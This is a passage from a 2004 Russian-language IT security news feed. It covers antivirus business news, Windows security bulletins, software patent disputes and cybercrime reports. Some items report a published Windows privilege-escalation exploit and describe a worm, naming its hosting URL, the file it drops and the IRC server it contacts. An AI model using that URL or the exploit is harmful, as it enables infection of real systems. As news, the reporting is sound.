Компания «ДиалогНаука», на долю которой 10 лет назад приходилось 95% продаж антивирусного ПО в России, переживает череду метаморфоз. Потеряв монополию на распространение продукта Dr.Web в Москве, компания подумывает о выходе на рынок интеграции. Новые владельцы антивируса полны амбициозных планов. Со времен своей фактической монополии на рынке антивирусного ПО в 1994 году антивирус Dr.Web постепенно терял позиции. Права на этот продукт принадлежали одному из его разработчиков Игорю Данилову. До некоторых пор г-на Данилова удовлетворяла ситуация, когда дистрибутором его решений в Москве была компания «ДиалогНаука». Сам г-н Данилов управлял небольшим предприятием «Санкт-Петербургская Антивирусная Лаборатория Данилова (СалД)», которая продавала Dr.Web в северной столице. Как стало известно CNews.ru, в декабре 2003 года Игорь Данилов зарегистрировал ООО «Доктор Веб», директором которого стал бывший коммерческий директор «ДиалогНауки» Борис Шаров. Одновременно компания «ДиалогНаука» перешла в разряд обычных дистрибуторов решения. Как рассказал CNews.ru Борис Шаров, ранее антивирус фактически поступал из «Лаборатории Игоря Данилова» для продажи в две компании – московское ЗАО «ДиалогНаука» и питерское ООО "СалД". При этом обе компании предоставляли пользователям версии продукта для скачивания с веб-сайта, генерировали лицензионные ключи, имели собственные дистрибутивы. «В результате деятельность по продвижению продукта (и в России, и за рубежом) велась несогласованно, что сказывалось на объемах продаж Dr.Web в целом», - считает г-н Шаров. В беседе с CNews.ru генеральный директор "ДиалогНауки" Сергей Антимонов также высказал мнение, что ранее бизнес на базе Dr.Web имел "разорванный" характер. По его словам, г-н Данилов (как физическое лицо) был владельцем всех копирайтов на все программы DrWeb, и он же был обладателем договоров с «ДиалогНаукой» и «СалД» о продаже этого продукта. При этом каждая из названных компаний выпускала собственный дистрибутив с разными инсталляторами, различной упаковкой и документацией. Кроме того, «СалД» и «ДиалогНаука» работали по несогласованным прайс-листам, имели каждая свое «представительство в Сети», выпускали различную рекламу в СМИ и участвовали в выставках независимо друг от друга. Г-н Антимонов считает, что все это очень тормозило развитие бизнеса на базе Dr.Web.
Более подробно

16/04/2004 11:39 Патент на FAT будет пересмотрен?
Именно с таким запросом в Патентное бюро США обратилась организация Public Patent Foundation. Предыстория вопроса следующая. В середине прошлого года в Microsoft пришел Маршалл Фелпс, ранее занимавшийся в IBM вопросами интеллектуальной собственности, и поднявший поток отчислений за использование патентов, принадлежащих IBM, с нулевого уровня в 85-м до нынешнего миллиардного бизнеса. В декабре Microsoft объявила о "либерализации" своей программы лицензирования, установив относительно небольшой размер отчислений за использование FAT в своих продуктах - по крайней мере, небольшой для тех, на кого эта программа была рассчитана, в первую очередь, на производителей цифровых камер, флэш-карт и аналогичного оборудования (25 центов за каждое pre-formatted устройство, с верхним пределом в 250,000 долларов на производителя). Однако, по словам исполнительного директора Public Patent Foundation, подобная ситуация абсолютно неприемлема для производителей бесплатного софта, которые просто не будут в состоянии продолжать распространять его по существующим лицензиям. Согласно тексту запроса, данный патент "наносит неизмеримый урон обществу, превращаясь в средство укрепления монополии Microsoft, препятствуя конкуренции со стороны бесплатного ПО", и вообще он вроде как недействителен, поскольку ему предшествовали патенты IBM и Xerox, полученные в 1988, 1989 и 1990, в то время как сама Microsoft получила его в 1996.
Источник

16/04/2004 11:07 Появление новой модификации вируса Mydoom
Компания Symantec зафиксировала появление новой модификации вредоносной программы Mydoom, сообщает "Компьюлента". Новая модификация червя, Mydoom.I, по своей функциональности близка к оригинальной версии. Вредоносная программа также распространяется по электронной почте в письмах с вложенными файлами. При этом вложение может иметь как одно, так и два расширения, а его название всегда выбирается из списка: body, data, doc, document, file, message, readme, test или text. После неосторожного запуска присланного файла червь добавляет записи в системный реестр, обеспечивая себе автоматический запуск при загрузке ОС, а затем пытается разослать собственные копии по найденным на компьютере жертвы адресам посредством встроенного SMTP-сервера. При этом обратный адрес фальсифицируется, а тема и содержимое письма генерируются произвольным образом из заложенного автором списка. Вредоносная программа способна заражать компьютеры с операционными системами Windows 95, 98, Me, 2000, NT и XP. О том, будет ли червь организовывать DoS-атаки на какие-либо интернет-ресурсы, в Symantec ничего не сообщают. Впрочем, пока вирус не получил особого распространения и, вероятнее всего, так и не получит.
Подробности

16/04/2004 10:44 Эксплоит одной из уязвимостей Windows
Как и следовало ожидать, после опубликования подробностей уязвимостей в семействе ОС Windows начинают появляться исходные коды, позволяющие эти уязвимости "использовать". Ввиду того, что очень большое количество пользователей обычно не "латают" свои операционные системы (то ли в силу неосведомлённости, то ли в силу природной безалаберности) следует ожидать всплеска взломов компьютеров. Итак, опубликован эксплоит, позволяющий использовать уязвимость в Windows Utility Manager, позволяющей в ОС Win2K локально повысить свои полномочия, выполнив код с полномочиями SYSTEM. Автор эксплоита - Cesar Cerrudo, в комментариях пишет, что использование эксплоита позволяет получить шелл с полномочиями SYSTEM, а также указывает, что в случае проблем рекомендуется поэкспериментировать с функцией Sleep(). В заключении напомним, что заплатка для этой (и других) уязвимости выпущена - см. бюллетень MS04-11.
Эксплоит

16/04/2004 10:32 Мексика готовит закон для борьбы с компьютерными преступлениями
Мексиканская группа по координации межведомственной борьбы с компьютерными преступлениями, руководство которой осуществляет федеральная полиция (PFP), разработала законопроект для предотвращения правонарушений, совершаемых через интернет. С помощью нового закона федеральные власти Мексики надеются придать компьютерным преступлениям равный с обычными незаконными действиями статус, сообщает сайт газеты La cronica de hoy. Согласно данным PFP, компьютерные преступления ежегодно наносят мексиканской экономике ущерб в размере до одного миллиона песо. При этом наиболее неблагоприятная обстановка с компьютерными преступлениями складывается в штатах Сонора, Нижняя Калифорния, Мексико, Морелос, Юкатан и Халиско, а также в федеральном округе. По мнению представителя одного из крупнейших торговых порталов Латинской Америки Mercado Libre Франсиско Себайоса Бланко (Francisco Ceballos Blanco) принятие закона крайне необходимо для пользователей сети в условиях постоянного роста количества компьютерных преступлений.
Источник

16/04/2004 10:13 Microsoft опубликовала еще одну XML-спецификацию
В четверг Microsoft расширила программу обнароования проприетарных диалектов, применяемых в ее ПО, опубликовав спецификации к своему графическому пакету Visio. Софтверный гигант предложил документацию и royalty-free лицензии на схему extensible markup language (XML), которую программа построения диаграмм и рисования использует для описания документов. В прошлом году Microsoft выпустила XML-схемы для трех основных приложений своего пакета Office System: программ разработки электронных таблиц Excel и электронных форм InfoPath, а также для текстового процессора Word. Microsoft говорит, что это решение направлено на расширение использования формата XML предприятиями и партнерами по разработке ПО, хотя аналитики отмечают, что программа реализуется также под давлением регулирующих органов. Маневры с XML рассматриваются и как часть постепенно нарастающего желания компании открыть основы своего ПО в рамках развивающейся инициативы Shared Source. Продукт Visio — тоже входящий в Office System — предназначен для построения сложных деловых схем вроде структуры организации. Продакт-менеджер Microsoft Бобби Мур говорит, что опубликовав XML-формат, который используется в этом приложении, Microsoft надеется побудить других производителей ПО к применению диаграмм Visio в качестве формата визуализации данных.
Подробнее

16/04/2004 09:51 Американские программисты создали трехмерный интернет-поисковик
Программисты из американского университета Пурдью (штат Индиана) разработали новую поисковую машину, которая будет искать в интернете не по словам, а по трехмерным объектам, cообщает lenta.ru. Пользователю придется самому нарисовать эскиз какого-либо нужного предмета, опираясь на который система найдет в сети схожие варианты. По информации сайта телекомпании MSNBC, новый поисковик понадобится прежде всего инженерам крупных промышленных компаний, которые тратят много времени на создание какой-нибудь детали, которая давно была создана кем-то еще. Существующий в настоящее время поиск картинок в таких сервисах как Google или Яndex работает по приципу ключевого слова. Поисковая машина проверяет подписи к изображениям, названия графических файлов (но не сами файлы) и выдает наиболее релевантные запросу результаты. Принстонский университет уже запустил поисковик, который ищет трехмерные объекты в базе из 36 тысяч моделей. Для этого пользователю предлагается нарисовать в одном, двух или трех видах нужный ему предмет и дополнить этьо соответсвующим словом.
Сайт поисковика

16/04/2004 09:27 “Интернет-терроризм” - новая угроза XXI века
По мере развития государства попадают в зависимость от высоких технологий, включая компьютеры, от которых все больше зависит управление жизненно важной национальной инфраструктурой. Из-за своей сложности и взаимозависимости важные системы представляют собой уникальную цель для технологических атак. Комплексные национальные системы представляют потенциальную опасность, так как имеют жизненно важные узлы, удар по которым может привести к разрушительным последствиям. Подобная атака может быть произведена компьютерным путем или с использованием взрывчатки, или путем вывода из строя кабелей с целью вызвать цепь аварий с итоговым коллапсом всех контрольных систем трубопровода или аэропорта. Масштабные отключения электроэнергии, парализующие значительные части страны, системные проблемы с контролем полетов, аварии на газо- и нефтепроводах – все это детально обсуждается и анализируется в прессе, специальных изданиях, Интернете. Террористы, будучи частью публики, наблюдающей эту дискуссию, все больше осознают, что национальная инфраструктура представляет собой заманчивую и уязвимую цель. Террорист, желающий оказать влияние на события в мировом масштабе, может избрать своей целью международную банковскую систему или ведущую биржу. Удачно осуществленный удар будет иметь и прямой эффект, но наиболее значительные последствия данной операции будут выражаться не в денежном эквиваленте, а в ущербе доверию людей и соответствующих долговременных политических и экономических последствиях. Сегодня многие террористические группы и движения имеют свои сайты в Интернете. Они используют Интернет для пропаганды, сбора средств и вербовки кадров, для связи в реальном времени при проведении операций. Подобные организации рассматривают возможности Интернета в качестве наступательного оружия, как «массовое оружие подрывных действий». Ведется подготовка кадров в плане использования вирусов: «червей», «троянских коней», «снифферов» и т.д., которые умножают возможность причинения вреда.Учитывая опасные тенденции кибертерроризма, можно предположить, что настанет день, когда некоторые террористические группы будут существовать только виртуально, будут исключены личные контакты, а члены организаций будут общаться через Интернет, подготавливая атаки по отключению и другие операции против стран с развитой компьютерной сетью. Удары будут направлены против банковской и коммерческой систем, электронного сервиса, управляемых компьютером инфраструктур, например, газо- и нефтепроводов, электрических сетей, систем контроля за наземным и воздушным транспортом, телефонных систем, сферы здравоохранения, оборонных систем коммуникации и снабжения. В той или иной степени они все уязвимы для электронных атак и подрывных действий. Прим. ньюсмейкера - вот такой вот "Кибер-Апокалипсис" предрекает нам сайт украинской кибер-полиции ;)
Источник

15/04/2004 16:19 Новый поисковый сайт - SecurityDocs.com
2 месяца назад в Интернете запущен новый поисковый сервер SecurityDocs.com. Предназначен для поиска разнообразной документации, отчётов об уязвимостях и будет полезен специалистам по безопасности, системным администраторам, IT-специалистам. В настоящий момент на сайте размещено около 1400 документов, разбитых на 80 категорий. Представлены следующие категории: безопасность приложений, восстановление данных, файрволлы, эксплоиты (malicious code), ПО обеспечения безопасности, безопасность беспроводных сетей, криптография, определение попыток вторжения, операционные системы, безопасность Вэб-приложений и т.д. Сервис не требует никакой регистрации.
Поисковый сервер

15/04/2004 14:45 Хакеры атаковали крупнейшие суперкомпьютерные системы США
В конце марта - начале апреля крупнейшие американские суперкомпьютерные системы подверглись хорошо скоординированной хакерской атаке, сообщает "Компьюлента". Под ударом оказались Стэнфордский национальный центр атмосферных исследований, Суперкомпьютерный центр в Сан-Диего и Национальный центр суперкомпьютерных приложений при Иллинойсском университете. Несмотря на то, что в официальных заявлениях практически ничего не говорится о нанесенном ущербе, эксперты полагают, что нападение может иметь далеко идущие последствия. Как сообщает Associated Press, в результате атаки неизвестные злоумышленники получили доступ к вычислительным мощностям вышеназванных суперкомпьютерных центров. Кроме того, в ходе нападения была задействована широкополосная сеть TeraGrid, обеспечивающая связь между различными научными организациями. В наибольшей степени пострадали серверы Национального центра атмосферных исследований, а также серверы, входящие в состав TeraGrid. На время устранения причин случившегося эти компьютеры пришлось отключить от Сети. По мнению специалистов, проведенный взлом может быть своеобразной репетицией готовящейся крупномасштабной DoS-атаки на ключевые узлы Всемирной сети или крупные онлайновые ресурсы. Огромные вычислительные мощности и каналы с высокой пропускной способностью, принадлежащие суперкомпьютерным центрам, подходят для этого как нельзя лучше. В настоящее время спецслужбы продолжают поиск злоумышленников, однако шансы на их поимку крайне невелики.
Подробности

15/04/2004 13:57 Программисты митингуют
Программисты из разных стран ЕС прибыли в среду в Брюссель в знак протеста против утверждения новой директивы о патентовании программ. В 11–30 утра на одной из площадей Брюсселя началась массовая акция протеста. Директива должна изменить существующее патентного законодательство, которое гласит: «математические методы, алгоритмы и правила ментальной активности, методы ведения бизнеса и программы для компьютеров не подлежат патентованию». Новый документ предполагает возможность патентования алгоритмов и коммерческих методов их использования, а также программ целиком. До сих пор ПО защищалось только авторским правом. Это всех устраивало, потому что никто не требовал от программиста обращаться в патентное ведомство и оплачивать заявку на патент. Обсуждения новой директивы продолжаются уже больше года. В сентябре прошлого года Европарламент огласил свои рекомендации для будущего документа, предлагая применять патентование только в тщательно регламентированных, исключительных случаях. Однако в опубликованном недавно черновом варианте документа эти рекомендации полностью игнорируются. Вместо этого директива предполагает патентование всех компьютерных программ, причем за получение каждого патента придется платить. Сами программисты считают, что это губительно для мелких разработчиков ПО, которые могут исчезнуть с рынка под давлением финансовой мощи крупных корпораций.
Источник

15/04/2004 13:52 Выход журнала Crypto-Gram
По традиции 15 апреля выпущен очередной (апрельский) номер ежемесячного журнала, посвящённого криптографии и сетевой безопасности Crypto-Gram. Журнал издаёт Bruce Schneier - основатель и CTO компании Counterpane Internet Security, Inc. В номере: National ID Cards; TSA-Approved Locks; Crypto-Gram Reprints; Stealing an Election; Counterpane News; Security Notes from All Over: Man-in-the-Middle Attack; BeepCard; Bluetooth Privacy Hack; News; Virus Wars; Comments from Readers.
Журнал

15/04/2004 13:03 Выход Linux-2.4.26
Вышла очередная версия ядра Linux ветви 2.4 - 2.4.26. По сути является 2.4.26-rc4. Основные изменение от 3-го релиз-кандидата: устранена утечка памяти в системном вызове do_fork(); устранена уязвимость, связанная с символической ссылкой файловой системы iso9660 (CDROM); изменения в коде для платформы PowerPC.
ChangeLog

15/04/2004 12:34 Суд отложил вынесение приговора хакеру, взломавшему сеть New York Times
Запланированное на прошлую неделю вынесение приговора по делу 23-летнего американца Эдриана Ламо, признанного виновным в незаконном проникновении в корпоративную сеть газеты New York Times, отложено. Оглашение вердикта в отношении студента, в 2002 году взломавшего сеть одного из самых известных мировых СМИ, должно было состояться 8 апреля. Однако судья Наоми Бухвальд согласилась с доводами защиты Ламо и перенесла слушание на 16 июня, сообщает сайт Security Focus. Сам Ламо, равно как и его адвокат Шон Хекер, решение суда о переносе даты вынесения приговора комментировать отказались. Подобная молчаливость несвойственна Ламо, сумевшему стать объектом общественного внимания в США после доступа в защищенные сети крупных корпораций вроде Excite@Home и Worldcom. При этом все детали проникновения в корпоративные сети 23-летний американец охотно обсуждал со СМИ.
Подробнее

15/04/2004 12:23 Microsoft уличили в утаивании исходных кодов
Американский окружной суд в рамках процесса по делу компании Microsoft пришел к выводу, что она недостаточно полно раскрывает исходные коды своих операционных систем. Как сообщает Reuters, это заявление содержится в очередном протоколе судебных заседаний в рамках предъявленных антимонопольных исков. Как известно, недавно Microsoft по судебному решению принудили раскрыть коды своих операционных систем для того, чтобы другие разработчики программного обеспечения могли более эффективно интегрировать с ними свои продукты. Вместе с тем, контролирующие структуры пришли к выводу, что во исполнение этого решения Microsoft ограничивает число подлежащей предоставлению документации. В связи с этим власти США намереваются провести "детальную ревизию технической документации".
Источник

15/04/2004 12:01 Microsoft продлила жизнь JVM
Виртуальная машина Java (JVM) сохранится в продуктах Microsoft до конца 2007 года. 8 апреля компания поместила на свой веб-сайт для разработчиков объявление, гласящее, что Microsoft и Sun Microsystems согласились продлить лицензию Microsoft на Java, что позволит Microsoft продолжать поддержку своей JVM. Программное обеспечение Microsoft JVM необходимо для работы Java-программ в многочисленных приложениях для ПК, таких как старые версии Microsoft Office. Microsoft больше не распространяет Microsoft JVM и не выпускает никаких дополнений к этому ПО. Продолжение поддержки Microsoft Java — один из первых признаков сотрудничества между софтверным гигантом и Sun, которые в начале этого месяца подписали широкое соглашение о прекращении продолжающихся судебных процессов и кооперации в области взаимодействия продуктов. До заключения соглашения лицензия Microsoft на JVM была объектом многолетней судебной тяжбы: Sun утверждала, что Microsoft нарушает условия своей лицензии. В 2001 году компании пришли к соглашению, по которому Microsoft до января 2004 года должна была прекратить поставку продуктов, содержащих JVM от Microsoft. В октябре этот срок перенесли на сентябрь 2004 года. Последнее соглашение между Sun и Microsoft вновь переносит крайний срок поддержки — на этот раз до 31 декабря 2007 года. Microsoft призывает заказчиков установить на своих ПК виртуальные машины Java от других поставщиков, таких как Sun, в которых исправлены ошибки и добавлены новейшие функции.
Источник

15/04/2004 11:29 Кто страдает от киберпреступности
Главной жертвой киберпреступности является экономика, но не застрахованы от нее ни органы власти, ни даже рядовые граждане. Опрос предприятий, проведенный в США, показал, что 85% из них хотя бы однажды подвергались сетевым атакам. В докладе британской Ассоциации управления системами связи указывается, что проблемы с «хакерами» имеют треть крупных фирм и государственных организаций. В США Пентагон за прошлый год зафиксировал 22 тысячи попыток несанкционированного проникновения в свои системы. А ФБР выявило более 5 тысяч корпоративных и ведомственных сетей, которые не имели защиты от взломов, что, по мнению нового директора ФБР Рональда Л.Дика, может «дестабилизировать всю экономику страны». Экономические последствия преступлений в киберпространстве с трудом поддаются исчислению, поскольку фиксируемые правонарушения составляют лишь верхушку айсберга. Ряд исследований, проведенных в Европе и США, показывают, что в полицию обращается лишь треть пострадавших. По имеющимся оценкам, одни только махинации с кредитными карточками обходятся в 400 миллионов долларов ежегодно; вирусы за тот же период наносят ущерб на 12 миллиардов. Упущенная прибыль из-за незаконного использования патентов и торговых марок в сумме составляет 250 миллиардов долларов в год - 5% от объема мировой торговли...
Источник

15/04/2004 11:13 В Интернете появилась новая поисковая система
Крупнейший интернет-магазин Amazon.com запустил собственную поисковую систему, чтобы облегчить своим посетителям поиск информации в Интернете, в том числе и дополнительной информации о своих товарах, сообщает Associated Press. Новый ресурс называется A9.com и пока что он работает в виде бета-версии. Перекрестный поиск будет осуществляться не только с Google, Yahoo! и другими уже известными поисковиками, но и с новой поисковой системой от корпорации Microsoft, запуск которой планируется в этом году. А9.com, как и многие другие системы, поддерживает поиск и через web-интерфейс, и через встраиваемую панель для Internet Explorer. Но поиск пока что ограничен только товарами, представленными на Amazon.com, или текстами книг, которые продаются там же.
Источник

15/04/2004 10:09 Lindows стала называться Linspire
Поддавшись давлению Microsoft, компания Lindows переименовала свою операционную систему. В среду Lindows объявила, что ее версия операционной системы Linux теперь будет называться Linspire и что веб-сайт с аналогичным названием станет главным онлайновым пристанищем для тех потребителей, которые желают приобрести продукты компании или нуждаются в поддержке уже купленного ПО. Изменение названия было ожидаемым событием после недавних судебных постановлений в европейских странах. На прошлой неделе компания признала, что судебные иски со стороны Microsoft, отказывающей Lindows в праве так называться, вынудили ее принять новое имя для европейского и других зарубежных рынков. Однако в Соединенных Штатах, где Lindows добилась более ощутимых промежуточных успехов в судебных баталиях с Microsoft, название Lindows все же будет использоваться в качестве названия компании и в некоторых других случаях.
Подробности

14/04/2004 15:19 Спаммеры следят за своими жертвами
В последнее время спаммеры все чаще вставляют в свои письма код, позволяющий оценить «поражающую способность» рекламной кампании. По данным денверской компании MX Logic, на которую ссылается журнал PCWorld.com, приблизительно половина всех рекламных сообщений, разосланных спаммерами за последний год, содержала в себе так называемые «маяки»: фрагменты HTML-кода, сообщающие операторам о том, сколько писем из всего разосланного массива были реально открыты жертвами. Такая тактика позволяет спаммерам более качественно сортировать имеющиеся у них в наличии списки почтовых адресов и отделять «живые» ящики от «мертвых», а также (во многих случаях) вычислять используемые ими типы соединения с Сетью: кабель, xDSL, обычный dial-up и так далее. Код действует предельно просто: после открытия письма пользовательский браузер или почтовый клиент находит в теле сообщения ссылку на файл с изображением, лежащий на спаммерском сервере. Запрашивая разрешение на доступ к картинке, используемая пользователем программа одновременно «сдает» спаммеру почтовый адрес клиента, а сам сервер определяет его IP-адрес. Все остальное – дело техники. Разумеется, все эти хитрости работают только в том случае, если в вашем почтовом клиенте включена функция автоматического просмотра писем, пришедших в HTML-формате. Соответственно, для того, чтобы защитить себя от излишне пристального взгляда нового «большого брата», в большинстве случаев достаточно отключить функцию автоматического перехода в HTML или же перейти на использование более современных почтовых клиентов и почтовых служб, умеющих блокировать «маяки»
Источник

14/04/2004 13:54 Уязвимости в Windows обнаружены eEye
Оказывается, большинство уязвимостей, которые были спешно залатаны Microsoft, обнаружены извествнейшей компанией eEye Digital Security. На обновлённой странице "Released Advisories" появилось сразу 6 описаний уязвимостей: переполнение кучи в Windows Metafile (связано с библиоткой GDI - GDI32.dll); локальное расширение полномочий в Windows VDM TIB (VDM - виртуальная машина DOS - Virtual DOS Machine); расширение локальных привилегий при расширении вниз сегмента данных (Windows Expand-Down Data Segment); удалённое переполнение буфера при использовании сервиса Windows LSA (Local Security Authority), представленном библиотекой LSASRV.DLL; удалённое переполнение буфера в службе RPC DCOM, которое может возникнуть на этапе обработки запросов активации (модуль RPCSS); утечка памяти при обработке RPC DCOM-запросов. Изменения внесены в сканер, выпускаемый компанией - Retina Network Security Scanner.
Подробности

14/04/2004 13:19 NetScreen представил гибрид МСЭ и системы обаружения вторжений
Компания NetScreen, приобретенная недавно производителем маршрутизаторов Juniper Networks за $3,4 млрд., представила свой новый продукт на рынке межсетевых экранов (МСЭ), сообщается в пресс-релизе компании. Интегрированный шлюз безопасности, ISG 2000, по задумке NetScreen, должен объединить в себе функции межсетевого фильтра и системы предотвращения вторжений. Устройство стоимостью $38 тыс., по утверждению NetScreen, поможет удешевить расходы компаний на защиту своих сетей, заменив собой приложения защиты, стоящие на каждом компьютере, а также удешевит эксплуатационные расходы. ISG 2000 выполняет функции МСЭ в канале до 2 Гбит/с и виртуальной частной сети до 1 Гбит/с. Такая производительность была достигнута за счет процессоров GigaScreen3 с удвоенной пропускной способностью в сравнении с предыдущими моделями. Само же устройство было собрано из отдельных аппаратных модулей, разработанных компанией ранее. Ко второму полугодию компания готовит к устройству новый модуль обнаружения и предотвращения вторжений (IDP), умеющий отражать 1500 типов атак. Это в шесть раз больше, чем может нынешняя технология "глубокой инспекции" (Deep Inspection).
Источник

14/04/2004 12:45 Everyone.net предлагает новый способ защиты от спама
Компания Everyone.net разработала новую технологию защиты от спама, а точнее, от одной из его разновидностей - так называемых возвратных почтовых атак. Такие атаки могут автоматически генерироваться вредоносными программами или организовываться спамерами, похитившими адреса электронной почты пользователей Сети. Причем входящие сообщения с рекламой или другим "мусором" в этом случае маскируются под ответы на письма, которые на самом деле никогда не отправлялись. Система, предложенная фирмой Everyone.net и реализованная в программном пакете Total Protection 2.0, основана на использовании почтовых "отпечатков пальцев". Работает комплекс следующим образом. Все исходящие послания, отправляемые пользователем, снабжаются расширенным заголовком, в который внедряется уникальная цифровая подпись, сформированная при помощи симметричного криптографического ключа на основании каких-либо персональных данных. Письма, созданные с помощью кнопки "Ответить" или "Ответить всем" почтового клиента, как правило, содержат какую-то часть информации оригинального сообщения, в частности, исходный текст, а также заголовок, к которому просто добавляется префикс Re:. Таким образом, в ответное письмо в любом случае попадает и уникальная подпись первого отправителя, которую и ищут почтовые серверы. В случае, если программе Total Protection 2.0 удается обнаружить "цифровой отпечаток" в ответном послании, оно перемещается в ящик пользователя. Если же подпись отсутствует или не соответствует оригинальной, сообщение расценивается как спам и фильтруется.
Подробности

14/04/2004 11:51 В инет под чужим аккаунтом - уголовщина
Довольно интересная информация была размещена на сайте bugtraq.ru. 25 марта в Екатеринбурге вынесен приговор студенту одного из ВУЗов. Летом 2003 года молодой человек несколько раз осуществил доступ в сеть интернет с использованием чужих регистрационных данных. Суд квалифицировал эти действия как неправомерный доступ к охраняемой законом компьютерной информации (ст. 272 УК РФ) и незаконное получение сведений, составляющих коммерческую тайну (ст. 183 УК РФ). Учитывая смягчающие обстоятельства, дело закончилось не тюремным заключением или исправительными работами, а штрафом в размере 6500 рублей. В ссылке ниже приведены отсканированные документы суда.
http://hohol.web.ur.ru/12345.htm

14/04/2004 11:34 Франция признала распространение информации об уязвимостях незаконным
7 апреля во Франции был принят законопроект под названием LEN (loi pour la confiance dans l'économie numérique), в соответствии с которым:
- присутствие на сайте (машине пользователя) кодов эксплоитов, информации об уязвимостях, информации об технологиях взлома - является НЕЗАКОННЫМ.
- наличие или распространение хакерского ПО, ПО для обеспечения безопасности, сканеров, инструментов проверки уязвимостей, списков рассылки по безопасности является НЕЗАКОННЫМ.
- журналы и вэб-сайты, распространяющие (публикующие) информацию об уязвимостях и эксплоитах являются также НЕЗАКОННЫМИ.
По поводу этого законопроекта в BUGTRAQ развернулись бурные дискуссии, однако, в большинстве своём, исследователи безопасности называют подобный прецедент настораживающим. В приведённой ниже ссылке можно ознакомиться с мнением различных экспертов по этому вопросу.
Подробности

14/04/2004 11:08 Браузер-опасный инструмент?
В понедельник Ассоциация индустрии компьютерной технологии (CompTIA) распространила второй ежегодный отчет по ИТ-безопасности. В опросе приняли участие почти 900 организаций, которые должны были указать 15 главных, с их точки зрения, проблем безопасности. Согласно полученным результатам, за последние шесть месяцев 36,8% организаций подвергались хотя бы одной атаке, связанной с браузером. Эта цифра на 25% превышает аналогичный показатель из прошлогоднего отчета. «Атаки, связанные с браузером, демонстрируют естественную эволюцию, — говорит директор CompTIA по ИТ Рандалл Палм. — Чем лучше мы им противостоим, тем изобретательнее становятся хакеры. Десять лет назад большинство вирусов распространялось через дискеты. Теперь они нацелены главным образом на браузеры». Атаки через браузер, как правило, реализуются при посещении пользователем веб-страницы, которая кажется безвредной, но на самом деле содержит скрытый код, нацеленный на нарушение работы компьютера или кражу содержащихся в нем данных. Некоторые атаки просто выводят браузер из строя, другие создают условия для хищения конфиденциальной персональной информации. Один из наиболее распространенных способов осуществления таких атак — рассылка электронных сообщений, содержащих ссылку на веб-сервер злоумышленника. Так как эти атаки обычно реализуется только после того, как пользователь кликнет на ссылке, многие брандмауэры их не засекают. Традиционные межсетевые экраны анализируют только входящий трафик, а для защиты от атак через браузер необходимо проверять еще и исходящий.
Подробности

14/04/2004 10:57 Система реального времени ADwin
В компании Keithley Instruments разработана система ADwin, предназначенная для управления и сбора данных в реальном масштабе времени как в производственных применениях, так и в НИОКР в области автоматизации конвейерных линий, стационарных и передвижных лабораторий, стендовых испытаний, управления позиционированием инструмента и тестирования компонентов. ADwin наиболее эффективна в приложениях, связанных с выполнением высокопроизводительных вычислений или продолжительных тестов, не допускающих остановок. В ней использован 32-разрядный цифровой сигнальный процессор с плавающей запятой Shark-ADSP 21062 с внутренней памятью емкостью 256-512 Кбайт и оперативной памятью SDRAM емкостью до 32 Мбайт для хранения данных. Предусмотрена возможность расширения числа аналоговых и цифровых входов и выходов. В сочетании с программной средой реального времени ADbasic обеспечивается время реакции, не превышающее одной микросекунды. Возможно как автономное применение ADwin, так и использование ее с программированными логическими контроллерами или ПК с ОС Windows. Система поддерживает ПО Test Point, Labview, LabWindows, HP-VEE, InTouch, DIAdem, Matlab, Visual Basic, Visual C, C/C++, Active-X, Delphi, а также Excel, Access и Word.
Источник

14/04/2004 09:49 4 бюллетеня по безопасности от Microsoft
Несколько нарушив старую традицию, Microsoft опубликовала не 3, а целых 4 бюллетеня по безопасности: MS04-11, MS02-12, MS04-13, MS04-14. Количество уязвимостей, которые описываются в этих бюллетенях впечатляет, кроме того, три первых патча имеют код "критических", а 14-й - "важный". MS04-11 описывает 14 (!!) критических уязвимостей в семействе NT-ориентированных ОС (NT/2K/XP/2003). Уязвимости разнообразны и затрагивают множество служб и протоколов: LSASS, LDAP, PCT, Winlogon, Metafile, Help and Support Center (см. вчерашние новости) и др. Природа уязвимостей разннообразна, использование этих уязвимостей может привести к различным последствиям - выполнение произвольного кода, произвольная загрузка программ, получение полного контроля над системой, просмотр и удаление данных, создание ользовательского эккаунта в системе. В бюллетене MS04-12 описывает уязвимость в печаль знаменитой со времён появления MsBlast службе RPC/DCOM. Семейство ОС - то же. Бюллетень описывает чуть поменьше уязвимостей в RPC/DCOM - всего лишь 4. Уязвимости в следующих компонентах и службах: RPC Runtime Library, RPCSS Service, COM Internet Services (CIS) (RPC поверх HTTP), Object Identity. Ожидаем очередного всплеска взломов через службы RPC/DCOM. Третий бюллетень MS04-13 описывает уязвимость в почтовом клиенте Outlook Express. Из-за некорректной реализации обработки URL MHTML существует возможность произвольного кода в зоне безопасности Local Machine с дальнейшим получением полного контроля над системой. В этой уязвимости примечательно то, что уязвимыми являются даже системы в которых OE не является почтовым клиентом по умолчанию. Уязвимые версии OE - 5.5 SP2, 6 c сервис-паками. Ну, и наконец, последний бюллетень MS04-14 связан с уязвимостью в системах, использующих Microsoft Jet Database Engine. При создании определённым образом созданного запроса к базе данных удалённой машины, использующей движок Jet, может возникнуть ситуация переполнения буфера с полным захватом машины злоумышленником. Уязвимо опять же семейство NT - NT/XP/2K/2003. Всем пользователям Windows настоятельно рекомендуется обновиться в кратчайший срок.
Cписок бюллетней

14/04/2004 09:17 Появление нового червя
В BUGTRAQ сообщается о появлении нового червя, тело которого загружается при посещении страницы http://www.mikenoels.net/matrix.swf/index1.html (рекомендуется не открывать эту ссылку). При заражении червь создаёт в реестре ключ \HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603 и добавляет файл "umcss.exe" в директорию C:\windows(winnt)\system32. В свою очередь, исполнимый файл порождает подключение к IRC-серверу apollo.uplinkearth.com к порту 6667. Предполагается, что целью подключения к IRC-серверу является осуществление DoS к владельцу IRC-сервера. Помимо этого, добавляет в файл mirc.ini строку, которая загружает скрипт custom1.mrc, который добавляет строку "on join" и при подключении к IRC-каналу рассылает посетителям его много сообщений.
Источник

13/04/2004 18:08 Уязвимость в Adobe Acrobat Reader
